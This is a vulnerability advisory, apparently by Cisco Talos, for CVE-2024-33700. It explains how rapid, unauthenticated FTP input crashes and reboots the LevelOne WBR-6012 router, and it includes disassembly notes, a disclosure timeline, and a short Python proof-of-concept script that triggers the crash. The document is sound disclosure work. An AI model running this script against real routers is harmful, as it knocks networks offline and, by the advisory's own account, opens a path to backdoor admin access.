CVE-2024-33700
The LevelOne WBR-6012 router firmware R0.40e6 suffers from an input validation vulnerability within its FTP functionality, enabling attackers to cause a denial of service through a series of malformed FTP commands. This can lead to device reboots and service disruption.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20 - Improper Input Validation
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The LevelOne WBR-6012 fails to validate user input, allowing an attacker to reboot the device by sending a series of unauthenticated FTP inputs.
The main FTP function is located at 0x800c1a44 and handles command line input for several FTP commands. However, the device does not properly handle receiving input before it has sent the output of the previous command. For example, when sending an FTP command, a normal FTP client will wait for a response from the server before sending the next message. The device accounts for this scenario: receiving a command, parsing and processing it, sending an appropriate response message, and waiting for the next command.
However, if an attacker were to send multiple messages before the device has fully completed the command-processing loop, an unknown error occurs causing the device to crash and reboot. The FTP protocol uses a return and newline to indicate the end of a command and this vulnerability can be triggered by sending any sequence of characters terminated by \r\n, including legitimate FTP commands, in quick succession. The TCP stream in such a scenaio could resemble the following:
220 FTPd 1.6
AA
500 Bad command
AA
AA
500 Bad command
Note the third “AA\r\n” occurs before the response from the second. The device crashes and reboots at this point.
Early in the main FTP function (0x800c20a0) a buffer is created (0x800c1b14) to receive and process network data. Almost all of the FTP application’s logic exists within this loop.
recv_data_buffer
800c1b14 21 28 c0 02 move a1,s6
800c1b18 46 11 00 0c jal recv_data_get_buf_size undefined recv_data_get_buf_size(dword request, char * buffer, dword size)
800c1b1c bc 05 06 24 _li a2,0x5bc
Near the end of the command-processing loop, at 0x800c2084, the output response message is moved in to the a1 register before being passed to a send message function.
800c2084 21 28 40 02 _move a1=>s_500_Bad_command_80102560,output
The application then returns back to the start of the loop. This sequence is a likely candidate for the root cause of the crash, but without debug access to the device we can not say with absolute certainty.
The below PoC sends a series of three unathenticated FTP commands. This PoC is the simplest example but any combination and sequence of inputs can result in a crash if sent in quick succession.
import socket
host = '192.168.1.1' # device default
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host,port))
print(s.recv(1024))
for i in range(3):
s.send(b'AAA\r\n')
print(s.recv(1024))
s.close()
The device will crash and do a “hard” reboot (allowing for backdoor admin access via TALOS-2024-1979).
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.